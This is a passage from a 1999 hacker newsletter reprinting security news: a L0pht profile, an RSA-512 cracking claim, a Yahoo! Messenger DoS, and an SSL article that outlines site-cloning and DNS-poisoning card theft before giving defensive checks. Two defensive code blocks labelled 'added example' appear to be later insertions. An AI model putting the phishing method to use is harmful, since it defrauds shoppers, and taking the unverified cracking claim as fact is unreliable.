By Sylvia Dennis, Newsbytes.
October 03, 1999
Nortel Networks [NYSE:NT] has taken the wraps off a
network-based secure digital subscriber line (DSL)
technology.
The idea behind the technology, known as Secure DSL, is that
it stops any electronic incursions or eavesdropping on the
"always-on" DSL connections that many businesses and
serious home users of the Internet are now starting to use.
The system works by securing each DSL line with
network-based, packet firewalls, so precluding outside attacks.
Nortel says that Secure DSL is one element of a suite of new
capabilities announced today by Nortel Networks to enable
mass market DSL and will be offered as a new feature on the
Shasta Subscriber Service System (SSS).
The SSS consists of a Shasta 5000 Broadband Service Node
(BSN) with the IP (Internet Protocol) Service Operating
System (iSOS) and Service Creation System (SCS). The BSN
was developed by Shasta Networks, a company that Nortel
acquired in March.
Nortel says that the Shasta 5000 is currently deployed with
several service providers around the world which are
preparing for the transition to mass market deployment of
DSL and other broadband access technologies.
Initially, ten DSL service providers are offering the Secure
DSL service to their subscribers: Cayman Systems,
CopperCom, Efficient Networks, FlowPoint, Jetstream
Communications, Netopia, Network TeleSystems, Promatory
Communications, TollBridge Technologies, and Wind River
Systems.
Anthony Alles, Nortel's general manager, said that, because
DSL lines are typically always connected to the Internet,
unlike the intermittent, dynamic connections of dialup
networks, computers attached to DSL lines are exposed to
Internet security attacks.
As DSL becomes more widely deployed, he said, increasing
numbers of DSL subscribers have reported attacks on their
computers, sometimes leading to copying or destruction of
sensitive data.
"It's critically important for the rapid adoption of DSL that the
DSL industry find an easy, cost-effective solution for securing
always-on DSL lines," he said.
Alles said that DSL is a mass market technology, and will be
widely deployed to residential and small business customers,
most of whom lack the technical skills and resources to deploy
and maintain their own security systems.
"Security is an expectation, not a feature, for the mass market,
and DSL service providers which do not provide such integral
security capabilities may find themselves at a severe
competitive disadvantage," he said.
Pricing on the Shasta 5000 BSN starts at $30,000 for ISPs and
other interested carriers.
Further details of the technology can be found on the Web at
http://www.nortelnetworks.com/shasta .
@HWA
44.0 HACK, COUNTERHACK
~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:40 am CET
Here's another article on those "eight computer hackers in a dingy warehouse" called
the L0pht. A bit of history and methodology of the group along with some interviewing;
quite a good read. Read it
http://www.nytimes.com/library/magazine/home/19991003mag-hackers.html
HacK, CouNterHaCk
The members of L0pht can knock you off line, steal your
credit-card numbers and cut off the power for your whole
neighborhood. But they'd like you to think they're the good
guys. By BRUCE GOTTLIEB Photographs by DANA SMITH
"Would you like to see how to knock someone off the Web?" Silicosis asks.
Sili, as he is known, is a slim young man with serious eyes set deeply into a
delicate face. He's the newest member of a hacker collective known as L0pht
(pronounced "loft"). He becomes visibly uncomfortable when asked to talk about
himself. He gives his age as "mid-20's" and then clams up. But when the
conversation moves to hacking, Sili turns voluble: "I think it's a thrill to
look at a program and figure out how to make that program do something that it
was never designed to do in the first place. There's the challenge."
We sit down at a computer monitor while Sili explains his latest discovery. By
mimicking messages that typically flow between computers on a network, he can
reach out to almost anyone running Windows 95, 98 or 2000 in a large corporate
environment, or anyone using a cable modem, and forcibly disconnect them from
the Web. In a demonstration of this, he types a one-line command on his
computer and hits the return key with a flourish. Sure enough, the computer
across the room, which seconds before had been connected to M.I.T.'s server,
is now off line. The same technique, Sili explains, can be used to take
information flowing between the Web and your neighbor's computer and reroute
it into your own. A clever hacker could capture a neighbor's banking
transactions, passwords or credit-card information.
Sili published his research on L0pht's Web site in mid-August. The report
was covered in the computer publication Infoworld and the on-line
magazine ZDNet. At the time, a Microsoft spokesman, instead of
denouncing L0pht, expressed the hope to reporters that the group would
"design a more secure version of the protocol" -- a hackerproof set of
operating instructions for the computer.
This request strikes Sili as especially outrageous. "Why doesn't Ralph
Nader just redesign the Corvair?" he asks.
Nader is something of a role model at L0pht, a confederation of
eight young hackers who position themselves, incredibly enough,
as a consumer-advocacy group. But L0pht's tactics are a bit unorthodox:
breaking into software systems and then posting instructions on how to
do so on the Web, where they can be picked up by software designers
and malicious hackers alike. Intrigued, I paid a visit to their workshop.
L0pht's "laboratory" is the second floor of a ramshackle warehouse in
suburban Boston. Predictably, the door to the lab has a sign for the pizza
man -- "Domino's Knock Loudly."
The eight men who make up L0pht allow themselves to be identified only
by their screen names: Dr. Mudge, Space Rogue, Dildog, Brian Oblivion,
Kingpin, Silicosis, Weld Pond and John Tan. They look to be in their
20's or 30's, but their six-room suite is an adolescent geek's fantasy
clubhouse. One wall is papered with antiquated circuit boards while
another has a signed picture from Julie, Penthouse Pet. Junk food in the
cupboard is taken seriously. There are three different kinds of Cheez-Its:
hot and spicy, plain and white cheddar.
The warehouse brims with more than 200 computers ranging from
state-of-the-art Sun and Digital workstations to nostalgia pieces like
Commodore 64's and Apple IIe's. Black cables, yellow cables and
jumbles of thin rainbow-colored wires drip from the ceiling, all jacked in
to steel racks of oscilloscopes, radio transmitters, D.S.L. modems,
I.S.D.N. modems, half-opened C.P.U.'s and a 50-foot roof antenna.
The warehouse also contains several small-scale dummy computer
networks.
L0pht's "research" consists of trying to break into these internal systems.
Upon discovering a security flaw in commercial-network software, the
L0phties publish an advisory on their Web site. The advisory is a
double-edged sword: a detailed description of the flaw -- enough
information for other hackers to duplicate the "exploit" -- and a solution
that tells network administrators how to close the loophole.
L0pht's unorthodox methods have garnered praise from very unlikely
quarters. Sixteen months ago, L0pht appeared before the Committee on
Governmental Affairs of the United States Senate. Senator Fred
Thompson introduced L0pht not as a "gang" nor even a "group," but,
translating for Washington pols, as a "hacker think tank."
L0pht wowed the committee by reeling off an alarming list of security
holes in public and private systems. After the presentation, Senator
Lieberman gushed, "It is probably not what you came to hear, but
actually, I think you are performing an act of very good citizenship and I
appreciate it." Lieberman went on to compare L0pht, in a single
sentence, to both Rachel Carson and Paul Revere. "You are performing
a valuable service to your country," Thompson added, "and we
appreciate that and want you to continue."
The National Security Council is equally bullish on L0pht. I met the
N.S.C.'s director of information protection, Jeffrey Hunker, at Defcon,
an annual three-day "conference" attracting more than 2,000 computer
hackers from around the country. Hunker had come to talk about
President Clinton's initiatives on computer security (and to spy on
hackers, if you believe the whispers). He surprised me by raving about
the group's technical sophistication. "L0pht has carved out an interesting
niche for itself," he added, "and for similar-minded people --
white-hatted hackers. Their objective is basically to help improve the
state of the art in security and to be a gadfly, so to speak -- to identify
products that have vulnerabilities and make certain those vulnerabilities
get fixed."
When I told L0pht about Hunker's comments, they rolled their eyes,
saying, "You're not going to publish that, are you?"
For one thing, they had no wish to be identified as favorites of the
N.S.C., since that might jeopardize their standing among so-called
black-hat, or malicious, hackers. "We are all extremely ethical and
moral," one member allowed, "but we're not white-hat hackers. We have
our own moral and ethical standards" -- the term is gray-hat.
It's not hard to spot the reasons for the moral ambiguity. In their off hours,
Mudge and Dildog are members of Cult of the Dead Cow, a black-hat hacker group
that recently released Back Orifice 2000 (bo2k), a computer program that
enables a hacker to control another computer from afar. (The name is a crude
play on Microsoft's Back Office Server, a program that allows a legitimate
administrator to, among other things, control another computer on a
network.) But unlike Back Office, bo2k is "invisible,"
meaning that a hacker can spy on another user, even change files, without
the user's knowledge. Dildog, one of bo2k's authors, euphemistically
describes it as "a shy program." Jason Garms, the former head of
Microsoft's security-response team, is a bit more direct, labeling bo2k "a
malicious program, with malicious intent."
Perhaps because of their ties to the black-hat community, L0pht
members refuse to be identified, although they will let themselves be
photographed. As Space Rogue explains (and any hacker knows),
pictures are next to useless if you're trying to dig up private data on
someone.
When L0pht testified before the Senate, members would not accept
checks for hotel and travel expenses. As with members of the Witness
Protection Program who have come before the Senate, they were
reimbursed with cash. Senator John Glenn even signed pictures with
the group's screen names: "To Dr. Mudge. . . . To Space Rogue. . . . To
Weld Pond."
"Open up the raincoat to expose all the little parts," is how Mudge,
smiling, describes L0pht's ethos. Mudge will not disclose his
age, but mid-30's seems a good guess. He claims a college degree in
music with further course work in computer science. Mudge says that
early experimenting with computers led to informal warnings from certain
"three-letter agencies." He wears his hair below his shoulders, sports a
goatee and favors faded jeans and a T-shirt. In his Senate testimony he
claimed to have given training seminars at NASA and the National
Security Agency.
Mudge frankly admits that he'll answer anyone's technical questions
about hacking. "If a black hat approaches us and says, Hey, this is the
project or problem I'm looking at . . . we'll talk to them, no problem.
And if a government agency approaches us and says, How do you do
this, or, How does this work, we'll talk to them."
Of course, this laissez-faire attitude has its costs. Mudge says: "Full
disclosure is something we had to grapple with for a long time. The flip
side is that critics say, 'You're giving people tools that can actually do
bad things.' That is absolutely true. It's got a lot of nasty side effects."
For instance: last December, a hacker magazine called Phrack disclosed
a flaw in a network program called Cold Fusion. (Network programs
help manage computers that are linked together). In April of this year,
Weld Pond -- an older, thoughtful L0pht programmer -- discovered a
second, more serious way to exploit the flaw.
Weld immediately published an advisory on L0pht.com prescribing a fix.
Weld's report also contained enough detail to explain the flaw to
so-called "script kiddies" -- young, malicious hackers with limited
technical expertise -- who are among the most avid readers of L0pht's
advisories. In the span of three weeks, according to PC Week, hackers
inserted bogus text and images on at least 100 Cold Fusion systems,
including those of NASA, the Army and the National Oceanic and
Atmospheric Administration.
So why didn't L0pht contact Allaire, the small Cambridge, Mass.,
software firm that makes Cold Fusion, before releasing an advisory? The
reason, say Weld and the other L0phties, is that vendors usually sweep
tips from hackers under the rug. Vendors, claims L0pht, don't want
customers to think software has flaws. "We were trained by the vendors
to go public," says Mudge, "to give them a black eye."
With an attitude like this, it's tempting to blame Weld Pond, especially
since L0pht's advisory led to more security breaches than would have
occurred had nothing ever been reported. It's not enough to claim, as
Weld does, that "We try to stay somewhat neutral -- we're not on the
vendor's side, we're not on the hacker's side. When we release the tools,
they can be used for good or bad. It's up to the individuals to have
morals."
Mudge is currently writing a paper on a longtime hobbyhorse of his:
the vulnerability of electrical power grids to hacker attacks.
While the computers that control these power grids are not directly
connected to the Internet, Mudge thinks a hacker could still turn out the
nation's lights because utility companies have left the keys to their
computers under the proverbial doormat.
Mudge tells me that careless utility employees often put internal
documents on public servers perhaps to access them from home or
while on the road. Sometimes, Mudge claims, the documents explain
how to access the central computers. Central computers "might have no
attachment to the Internet," he says, "other than the fact that somebody
put up a document on the Internet describing how to get to it and how to
use it." Mudge pauses. "Well, that's just as good."
Mudge has written a program to scan utility companies' Web sites for
words like "confidential" or "password." "I'm not breaking any laws by
doing this, I'm just grabbing public stuff," he is quick to point out. "They
don't realize that they're putting it up there for the world to see."
He shows me a file downloaded from a large utility company that
contains a presentation on company security. Next he opens a file full of
phone numbers from another utility company. "It sounds almost
science-fictionist," he cautions, "but with these numbers here I'd be able
to turn off their entire grid." The phone numbers, he explains, connect to
modems linked to the central switches that determine where electricity
flows. "If I don't publish this information," Mudge claims, "someone else
will come along and do the same thing, with less ethical goals. Now you
can see a situation where people are dying because of these
corporations' stupidity. At that point, who's to blame?"
Given the stakes, Mudge intends to relax his commitment to so-called full
disclosure. "It's uncool," he says, for utility companies to "learn about a
problem by reading it in the newspaper." That's why he plans to alert
companies in advance, so they can close vulnerabilities before the news is
made public on L0pht's Web site.
Like Nader, the L0pht members can get a bit preachy on the subject
of ethics. "Any of us could leave L0pht right now and take
six-figure jobs," Mudge says. "The fact that we don't and we're on the
ramen-noodle, mac-and-cheese diet, that speaks for our ethics right
there. It's not a job for us; this is what drives us through life."
While Mudge's self-righteousness may be justified up to a point, there are
also more prosaic reasons for working at L0pht. Freedom to do whatever you
want, for instance. Silicosis and Brian Oblivion are installing a motor-driven
satellite dish on the warehouse roof. They hope to capture ground-to-space
communications from the Space Shuttle and high-resolution images of the earth
broadcast from satellites. The justification? It's cool. Silicosis adds, "It
impresses my girlfriend."
Space Rogue -- a sort of young Archie Bunker figure, to the extent that an
Archie Bunker figure can be young -- sticks closer to earth when asked how he
ended up at L0pht.
"I did one semester in college, said the hell with this and got out.
Controlled learning environments have never been my strong point."
L0pht gave him a place to pursue projects at his own pace.
Mostly, Space Rogue seems to like L0pht for the camaraderie. "I moved
to Boston in 1990," he says, "and I almost immediately met all these
people on line on local bulletin boards. L0pht started shortly thereafter in
fall '91. So I'd already known these people awhile, even face to face.
The on-line world at the time was very small."
Mudge recalls that the group took off when members moved their
computers from their living rooms to a small loft space in Boston. (All but
one of the founders, Brian Oblivion, have since left.) L0pht soon added
members and moved to a larger suburban warehouse four years ago. It
has also started a consulting business on the side called L0pht Heavy
Industries.
L0pht is not without critics, of course. "While L0pht puts on the
Robin Hood mantle of fighting the big computer companies," a
senior programmer at Microsoft tells me, "their only victims are the little
people that are customers" -- the people who purchase products like
Windows 2000.
Microsoft has been on the business end of several L0pht advisories, most
notably when Mudge and Weld demonstrated how to decrypt
passwords from computers running Microsoft's NT operating system.
Jason Garms, the former head of Microsoft's security-response team,
admits that hackers have a role in creating secure software. But he's wary
of the Darwinian notion that hackers will, by actively looking for flaws,
expose inferior products. He likens it to improving public safety by
painting a target on everyone's head.
I mentioned Garms's criticism to the L0pht members, who were equally
dismissive. If gray-hat hackers stopped searching for vulnerabilities,
L0pht believes, a black-hat hacker would find them sooner or later. It's
better to get rid of flaws than hope no one finds them. The N.S.C.'s
Hunker shares this belief -- "the hackers are already out there" -- which
is why he applauds L0pht for keeping vendors honest.
The senior Microsoft programmer also warns that Mudge and his
colleagues, for all their highfalutin apologia, are motivated mostly by
naked ego: "I am certain," he says, "that the primary motivation of these
people is simple self-gratification and justification."
I asked the L0pht members whether ego played a part in their ethical
reasoning. Weld Pond replied that, by assuming pseudonyms, they more
or less deny themselves the benefits of celebrity. "When I walk down the
street," he says, "no one knows I'm Weld Pond."
But at Defcon, the annual hacker convention, it was quite clear that
everyone knew Weld, Mudge, Space Rogue and Dildog. L0pht
members have become, as Mudge notes wryly, "rock stars of the
computer underground." That they help malicious hackers as well as the
Feds and big business hasn't hurt their popularity among the outlaws.
On the other hand, L0pht's poorly hidden hunger for the spotlight
shouldn't obscure the truly fascinating work they've done. Socially
important research is perfectly compatible with, and perhaps inseparable
from, love of celebrity, as James Watson has made admirably clear. Say
what you will, there is no denying that L0pht's advisories have improved
computer security even as they have harmed corporations and
government agencies.
No one doubts that information security is going to become an
increasingly critical topic as the ordinary economy moves into the digital
age. In their grander moments, L0pht's members hope to become digital
Ralph Naders, making sure that the software behind the transition is as
safe as manufacturers say.
The idea of eight computer hackers in a dingy warehouse insuring the
safety of the information age may sound a little farfetched. But sometimes
hackers eventually direct their curiosity toward laudable ends. Take, for
example, the two young hackers who engineered a small blue box in the
early 1970's that allowed free long-distance calls when placed near a
telephone receiver. The two enterprising techies went door to door in the
Berkeley dorms, selling the devices. Their names? Steve Jobs and Steve
Wozniak, future founders of Apple Computer.
Bruce Gottlieb was a staff writer at Slate magazine until enrolling in Harvard
Law School this fall.
@HWA
45.0 NO SAFETY IN NUMBERS
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:05 am CET
After an Israeli research institute said it could break Europe's banking codes in less
than a second, an initiative has been launched that could result in unbreakable codes.
The European Institute of Quantum Computing Network was founded a few weeks
after news leaked from Israel's Weizmann Institute that it was using a mixture of
quantum computing and special optical technology to break the RSA-512 code, the
system used by the European banking system. It claims it has developed a
hand-held device that can break the code in 12 microseconds. The Sunday Times
http://www.sunday-times.co.uk/news/pages/tim/99/09/29/timintint02001.html?1341861
Europe's banking codes have been cracked in the blink of an eye
End of the Enigma: Quantum Computing will spell the end of conventional
encryption, such as the codes broken at Bletchley Park
No safety in numbers
BEN HAMMERSLEY
ben.hammersley@the-times.co.uk
After an Israeli research institute said it could break
Europe's banking codes in less than a second, an initiative
has been launched that could result in unbreakable codes.
The European Institute of Quantum Computing Network
was launched on Monday, to bring companies and
research labs throughout Europe together in the hope that
the new technology - Quantum Computing - can be taken
from the theory to the high street.
The institute was founded a few weeks after news leaked
from Israel's Weizmann Institute that it was using a
mixture of quantum computing and special optical
technology to break the RSA-512 code, the system used
by the European banking system. It claims it has
developed a hand-held device that can break the code in
12 microseconds.
Quantum computing works by taking advantage of the
peculiar characteristics of subatomic particles. Whereas a
normal computer relies on a signal - or bit - being either
on or off, a quantum bit can be both on and off at the
same time. This unusual ability means a great deal more
information can be stored. While a regular computer
works through each sum one at a time, a quantum
computer can do every operation at the same time.
This, the EIQC says, offers, "not just incremental
improvements, but a fundamental breakthrough" in
computing power - enough for code-breaking,
voice-recognition and translating computers to be simple
to build.
The second aspect of Quantum computing, however, will
help to make information more secure. Using a feature
called "quantum entanglement", information could be sent
between two computers that could not be eavesdropped
upon without the two computers' knowledge. Because
quantum physics dictates that monitoring a subatomic
particle changes its state; not only would an eavesdropper
announce his presence, but the message would be
garbled.
"A hacker wouldn't know where to start," says Jonathan
Curtis of Quantum Electronic Devices.
As one member of EIQC, who wished to remain
anonymous, predicts: "While quantum computers may be
some time off, when they are available no communication
will be secure unless it is quantum."
@HWA
46.0 YAHOO! MESSENGER DoS
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 5:01 pm CET
A denial of service attack exists in build 733 of Yahoo! Messenger. The vulnerability
exists when Messenger leaves port 5010 open. When a connection is made on port
5010, Messenger crashes. The connection stays open until the user closes the
program. Team Asylum Security found that hole and informed Yahoo! of it. They have
released build 734. Yahoo! Messenger (Build 734) still has port 5010 open but will not
crash if connections are made to it.
http://www.team-asylum.com
@HWA
47.0 PROBLEM IN MFC40.DLL
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 4:35 pm CET
Microsoft informs us of a problem in Mfc40.dll. An internal function within Mfc40.dll is
designed to add 1900 to every 2-digit date that is passed to it. For example, 99 is
returned as 1999. If more than 2 digits are passed, nothing is added. Programs that
use this function may incorrectly parse a date after the year 2000. Solutions here.
http://support.microsoft.com/support/kb/articles/Q152/7/34.ASP
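The date-handling defect described above, modelled in C++ as an added example (not Microsoft's code): the legacy two-digit behaviour sits beside a windowed fix. The routine names and the 1950 pivot window are assumptions, since the page does not name the MFC function or specify a window.

```cpp
// Added example (not Microsoft code): models the Mfc40.dll behaviour
// described in the item above -- a two-digit year gets 1900 added, anything
// wider is passed through unchanged -- and places a pivot-year fix beside it.
// Function names are hypothetical; the page does not name the MFC routine.
#include <cstdio>

// Faithful model of the described legacy behaviour.
// Only values with two digits or fewer get 1900 added.
int legacyYear(int y) {
    if (y >= 0 && y <= 99)
        return y + 1900;   // 99 -> 1999, but 5 -> 1905 and 0 -> 1900
    return y;              // 2005 stays 2005
}

// Fixed version: two-digit years are mapped into a 100-year window that
// starts at `pivot`. With pivot=1950 (an assumed value), 0..49 -> 2000..2049
// and 50..99 -> 1950..1999. Pick the window to match the data you store.
int windowedYear(int y, int pivot = 1950) {
    if (y < 0 || y > 99)
        return y;                      // already a full year, pass through
    int base = pivot - (pivot % 100);  // century containing the pivot (1900)
    int candidate = base + y;
    if (candidate < pivot)
        candidate += 100;              // below the window: next century
    return candidate;
}

// True when the legacy routine would mis-date this input relative to the
// windowed interpretation, i.e. the post-2000 parsing problem the item warns of.
bool legacyMisdates(int y, int pivot = 1950) {
    return legacyYear(y) != windowedYear(y, pivot);
}

int main() {
    // Constructed sample inputs: two-digit years on both sides of the pivot
    // plus full four-digit years that must pass through untouched.
    int samples[] = {99, 0, 5, 49, 50, 1999, 2005};
    for (int y : samples)
        std::printf("%4d -> legacy %d, windowed %d%s\n", y, legacyYear(y),
                    windowedYear(y), legacyMisdates(y) ? "  (mis-dated)" : "");
    return 0;
}
```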
@HWA
48.0 US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:45 pm CET
The U.S. Treasury Department on Friday opened a center intended to help the
financial services industry and the government share information about cyber attacks
and threats. The Financial Services Information Sharing and Analysis Center was
formed following a directive from President Clinton that the Treasury Department work
with the banking and finance sectors to find ways to improve security of information
systems, according to a written statement issued Friday from the department. Read
more
http://www.infoworld.com/cgi-bin/displayStory.pl?99101.entreasury.htm
U.S. aims to fight attacks on financial systems
By Nancy Weil
InfoWorld Electric
Posted at 12:00 PM PT, Oct 1, 1999
The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber
attacks and threats.
The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work
with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the
department.
The center was officially announced by U.S. Treasury Secretary Lawrence Summers and is being supported by the U.S. Securities and Exchange
Commission and the Federal Reserve Board. A dozen financial services companies have said they are interested in participating in the center, according to
the statement.
"When I first joined the Treasury some years ago, I can assure you we were not thinking about threats to the financial system emanating from viruses, Trojan
horses, logic bombs, or malicious code," Summers said in a prepared statement delivered when he announced the center Friday morning. "But we are
thinking about those things now, and with good reason."
The pervasive use of the Internet by individuals and financial institutions has led to new needs when it comes to security, he said. A study last year by the
Computer Security Institute found that among companies polled, 64 percent had information system security breaches, up 16 percent over 1997, he added.
The total financial loss from the breaches rose 36 percent in a year.
"As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said in his written remarks. "We face a
future, though, where criminals, terrorists or even nation-states may use the same tools in a more organized way for darker purposes."
The new center, Summers said, "can play a key role in bolstering the confidence of the American public in the security and stability of our financial system" by
enabling the financial industry and the government to share details about cyber attacks and how to quell them.
Additional information about the center had not been posted on the Treasury Department Web site as of Friday afternoon. The department, in Washington,
can be reached at www.ustreas.gov.
Nancy Weil is a correspondent in the Boston bureau of the IDG News Service, an InfoWorld affiliate.
@HWA
49.0 DIGITALBOND ON SSL
~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:35 pm CET
SecurityPortal did an interview with Dale Peterson of DigitalBond, the company which
last week went public with some of the major problems in SSL, showing that this isn't
that secure either. The article also describes the actual workings of their attack on
the Secure Sockets Layer system. Read it here.
http://securityportal.com/direct.cgi?/closet/closet19990930.html
Special Kurt's Closet: Is SSL dead?
Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/
September 30, 1999 - The title is a bit scary, but I wanted to get your
attention (worked, didn't it?). Most security experts have been aware of problems
with SSL, but generally speaking we haven't said much because there wasn't
much of a replacement available for it, and it hasn't been exploited extensively
(chances are it will be, though). I'll start with an explanation of the basic
attack, followed by some methods to protect yourself, and finish with an
interview with Dale Peterson of DigitalBond and the summary.
How to do it
Let's say I want to scam people's credit card numbers, and don't want to break into a server. What if I could get
people to come to me, and voluntarily give me their credit card numbers? Well, this is entirely too easy.
I would start by setting up a web server, and copying a popular site to it, say www.some-online-store.com, time
required to do this with a tool such as wget is around 20-30 minutes. I would then modify the forms used to submit
information and make sure they pointed to my server, so I now have a copy of www.some-online-store.com that looks
and feels like the "real" thing. Now, how do I get people to come to it? Well I simply poison their DNS caches with my
information, so instead of www.some-online-store.com pointing to 1.2.3.4, I would point it to my server at 5.6.7.8.
Now when people go to www.some-online-store.com they end up at my site, which looks just like the real one.
How to prevent being taken
Most forms online are not on secure servers, but the data you provide is usually sent to a secure server, which leads
to one of the major problems. The form data may not be going where it should. A simple attack is to have the fake
site, and a form that takes the data, without using a secure server at all. How many of you actively check the source
HTML of pages you are plugging your credit card data into? The title bar should start with https:// followed by the
sitename (i.e.: https://www.microsoft.com/). You should also examine the HTML source to make sure the form data
points to where it should go, you should see something like:
<form method="POST" action="/order.cgi">
or:
<form method="POST" action="https://www.some-online-store.com/cgi-bin/order.cgi">
If a store is using the "GET" method, do not buy from them, any data you enter will be passed along as the query
string, if you look in the text of your address bar you will see your credit card info. If a store specifies a relative link
(i.e.: /something/something.cgi) then make sure the current site you are at is a secure server, and that the certificate
is legitimate. If the link is absolute, and points to an IP address, be suspicious, I personally would not buy if this were
the case. Ideally the link should point to something like "https://www.some-online-store.com/cgi-bin/order.cgi", and
you should first browse to that site, and make sure the certificate is legitimate, before hitting the submit button on
your order form. Most current SSL attacks are based on fooling the user, more so than breaking the technology. If you
are vigilant, and check certificates before you submit to sites you will be a little safer (but not completely).
SSL Certificates contain various pieces of information, such as who issued them, when it was issued, when it expires,
who it was issued to and so forth. Who it was issued to (usually the "subject") is a very important field, and the issuer
field. To view the certificate details double click on the lock icon, usually at the bottom left of the screen in Netscape,
and at the bottom right in Microsoft Internet Explorer. Let's take https://www.microsoft.com/ for example, the Issuer
field looks like:
OU = Secure Server Certification Authority
O = RSA Data Security, Inc.
C = US
The C stands for country, the O for organization (usually the company's name), and the OU stands for organizational
unit (a division of the company). The subject field looks like:
CN = www.microsoft.com
OU = mscom
O = Microsoft
L = Redmond
S = Washington
C = US
The S stands for state, the L for locality (the city), and the CN is the certificate name (the site it applies to). Make
sure all these are spelt correctly, many attackers will use domain names that look familiar (such as miicrosoft.com) in
order to get legitimate certificates. Taking these precautions every time you use an SSL secured service is tedious,
and underlines one of the major flaws with SSL, in that it is susceptible to "social engineering" attacks. Another flaw in
SSL is that it only secures the session, it doesn't secure any actual transaction. This means if someone does steal
your credit card number and use it online, it is almost impossible to prove that it wasn't actually you that issued the
order. SSL does allow for the client to authenticate to the server, however very few people have digital certificates
compatible with this (I have one, and know of perhaps a half dozen other people, a definite minority). In addition to
this the major certificate vendors have stopped issuing the personal certificates that guarantee the person's identity,
so they are a dead end. There are newer protocols and systems that allow for two parties to safely conduct
transactions with all these features.
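The two manual checks described above, the form-method and form-action rules from "How to prevent being taken" and the Subject CN spelling check, written out as an added example (not code from Kurt's article or from DigitalBond). The verdict labels, the `expected_host` parameter and the sample URLs are my assumptions, and the "within two edits" look-alike rule is a heuristic chosen here, not a rule from the text.

```python
"""Automate the two checks the article asks the user to do by hand:
where a form really sends its data, and whether the certificate Subject
names the site you meant to visit.  Sample URLs and DNs are constructed."""
import ipaddress
from urllib.parse import urlparse, urljoin


def assess_form(method, action, page_url, expected_host):
    """Classify one <form> tag as (verdict, reason).

    Rules follow the article: GET leaks the fields into the query string;
    an action that is not https:// is rejected; an action pointing at a
    bare IP address is suspicious; a relative action is only as safe as
    the page serving it, so the current site's certificate must be checked;
    an absolute https:// action must point at the host you expect.
    """
    if method.upper() == "GET":
        return "reject", "GET puts the form fields in the query string"
    target = urljoin(page_url, action)          # resolve relative actions
    parsed = urlparse(target)
    host = parsed.hostname or ""
    if parsed.scheme != "https":
        return "reject", f"form posts over {parsed.scheme}:// not https://"
    try:
        ipaddress.ip_address(host)
        return "suspicious", f"action points at a bare IP address ({host})"
    except ValueError:
        pass                                    # not an IP literal: fine
    if host.lower() != expected_host.lower():
        return "suspicious", f"action host {host!r} is not {expected_host!r}"
    if not action.lower().startswith("https://"):
        return "check-current-site", "relative action; verify this site's certificate"
    return "ok", f"absolute https action on {expected_host}"


def parse_dn(text):
    """Parse the 'KEY = value' lines shown in the browser's certificate
    dialog into {KEY: [values]}.  One field per line, so a value such as
    'RSA Data Security, Inc.' keeps its comma."""
    fields = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields.setdefault(key.strip().upper(), []).append(value.strip())
    return fields


def levenshtein(a, b):
    """Plain edit distance, used to spot look-alike names (assumed heuristic)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_subject(subject_text, expected_host):
    """Compare the Subject CN with the host you meant to reach.

    Returns (verdict, reason): "ok" on an exact match, "lookalike" when the
    CN is within two edits of the expected name (e.g. miicrosoft.com, for
    which an attacker can obtain a perfectly valid certificate),
    "mismatch" otherwise, "no-cn" when the Subject carries no CN.
    """
    cns = parse_dn(subject_text).get("CN")
    if not cns:
        return "no-cn", "Subject has no CN field"
    cn = cns[0].lower().rstrip(".")
    want = expected_host.lower().rstrip(".")
    if cn == want:
        return "ok", f"CN matches {want}"
    if levenshtein(cn, want) <= 2:
        return "lookalike", f"CN {cn!r} differs from {want!r} by only a few characters"
    return "mismatch", f"CN {cn!r} is not {want!r}"


if __name__ == "__main__":
    page = "https://www.some-online-store.com/checkout.html"   # constructed
    for method, action in [("POST", "/order.cgi"),
                           ("POST", "https://www.some-online-store.com/cgi-bin/order.cgi"),
                           ("GET", "/order.cgi"),
                           ("POST", "https://5.6.7.8/order.cgi")]:
        print(method, action, "->", assess_form(method, action, page, "www.some-online-store.com"))
    # Subject from the article's www.microsoft.com example, and a look-alike
    subj = "CN = www.microsoft.com\nOU = mscom\nO = Microsoft\nL = Redmond\nS = Washington\nC = US"
    print(check_subject(subj, "www.microsoft.com"))
    print(check_subject(subj.replace("www.microsoft", "www.miicrosoft"), "www.microsoft.com"))
```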
The following is an interview with Dale Peterson of DigitalBond (www.digitalbond.com). DigitalBond is currently working
on a product to secure Internet transactions, and is targeted at brokerage houses which have many thousands of
users on a daily basis, making them an especially tempting target.
Kurt: Is SSL dead?
Dale: No. It is a fine session encryption protocol. The editor for the TLS
(new name for latest version of SSL) spec works at Certicom and is our
partner. I've talked this over with him, and he is very insistent
that SSL is not broken. But he does say it suffers from all the
problems we have discussed in these emails and could be augmented with
a transaction protocol.
I think that it certainly shouldn't be the protocol for most
e-commerce transactions, but for the exchange of private data over the
Internet it is ok.
Kurt: What do you envision replacing SSL?
Dale: We see a lot of businesses that are doing two-party transactions.
Nice and simple, unlike the multi-party bank card model that SET
addresses. We have developed a two-party transaction security model
that we think meets the needs of Internet Brokerages, Internet
prescription drugs, and other two-party transactions. It is being
reviewed by Carnegie Mellon University, and they will publish a paper
this year.
Kurt: Should we be educating users about these technologies? Do they care?
Dale: The most important education needed is that SSL transactions are not
secure. The whole Internet community has been fed this baloney
because SSL was around and easy. I have found it difficult getting
reporters to even believe this vulnerability exists, even with a live
